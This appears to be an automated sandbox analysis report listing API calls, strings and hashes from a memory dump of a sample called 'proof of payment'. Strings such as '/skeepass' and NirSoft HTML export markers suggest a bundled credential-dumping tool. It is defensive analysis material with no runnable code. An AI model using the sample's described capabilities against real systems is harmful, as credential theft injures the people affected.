                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                      • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0041087D
                                      • memset.MSVCRT ref: 00410892
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                      • DeleteObject.GDI32(?), ref: 004109D0
                                      • DeleteObject.GDI32(?), ref: 004109D6
                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1010922700-0
                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                      • malloc.MSVCRT ref: 004186B7
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                      • malloc.MSVCRT ref: 004186FE
                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$FullNamePath$malloc$Version
                                      • String ID: |A
                                      • API String ID: 4233704886-1717621600
                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                      • API String ID: 2081463915-1959339147
                                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2012295524-70141382
                                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                      • API String ID: 667068680-3953557276
                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDC.USER32(00000000), ref: 004121FF
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                      • SelectObject.GDI32(?,?), ref: 00412251
                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                      • SetCursor.USER32(00000000), ref: 004122BC
                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                      • memcpy.MSVCRT ref: 0041234D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                      • String ID:
                                      • API String ID: 1700100422-0
                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                      • String ID:
                                      • API String ID: 552707033-0
                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                      • memcpy.MSVCRT ref: 0040C11B
                                      • strchr.MSVCRT ref: 0040C140
                                      • strchr.MSVCRT ref: 0040C151
                                      • _strlwr.MSVCRT ref: 0040C15F
                                      • memset.MSVCRT ref: 0040C17A
                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                      • String ID: 4$h
                                      • API String ID: 4066021378-1856150674
                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: %%0.%df
                                      • API String ID: 3473751417-763548558
                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                      • GetTickCount.KERNEL32 ref: 0040610B
                                      • GetParent.USER32(?), ref: 00406136
                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                      • String ID: A
                                      • API String ID: 2892645895-3554254475
                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                      • memset.MSVCRT ref: 0040DA23
                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                      • String ID: caption
                                      • API String ID: 973020956-4135340389
                                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf$wcscpy
                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                      • API String ID: 1283228442-2366825230
                                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • wcschr.MSVCRT ref: 00413972
                                      • wcscpy.MSVCRT ref: 00413982
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      • wcscpy.MSVCRT ref: 004139D1
                                      • wcscat.MSVCRT ref: 004139DC
                                      • memset.MSVCRT ref: 004139B8
                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                      • memset.MSVCRT ref: 00413A00
                                      • memcpy.MSVCRT ref: 00413A1B
                                      • wcscat.MSVCRT ref: 00413A27
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                      • String ID: \systemroot
                                      • API String ID: 4173585201-1821301763
                                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy
                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                      • API String ID: 1284135714-318151290
                                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                      • String ID: 0$6
                                      • API String ID: 4066108131-3849865405
                                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 004082EF
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                      • memset.MSVCRT ref: 00408362
                                      • memset.MSVCRT ref: 00408377
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 290601579-0
                                      • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                      • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$wcslen
                                      • String ID:
                                      • API String ID: 239872665-3916222277
                                      • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                      • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$_snwprintfmemset
                                      • String ID: %s (%s)$YV@
                                      • API String ID: 3979103747-598926743
                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadMessageProc
                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                      • API String ID: 2780580303-317687271
                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                      • wcslen.MSVCRT ref: 0040A6B1
                                      • wcscpy.MSVCRT ref: 0040A6C1
                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                      • wcscpy.MSVCRT ref: 0040A6DB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                      • String ID: Unknown Error$netmsg.dll
                                      • API String ID: 2767993716-572158859
